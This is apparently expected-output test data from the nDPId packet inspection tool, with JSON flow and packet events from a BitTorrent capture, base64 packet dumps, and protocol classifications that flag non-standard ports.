00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="}
00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="}
01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="}
00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="}
01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="}
00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="}
01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAAAFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="}
01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAFBAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
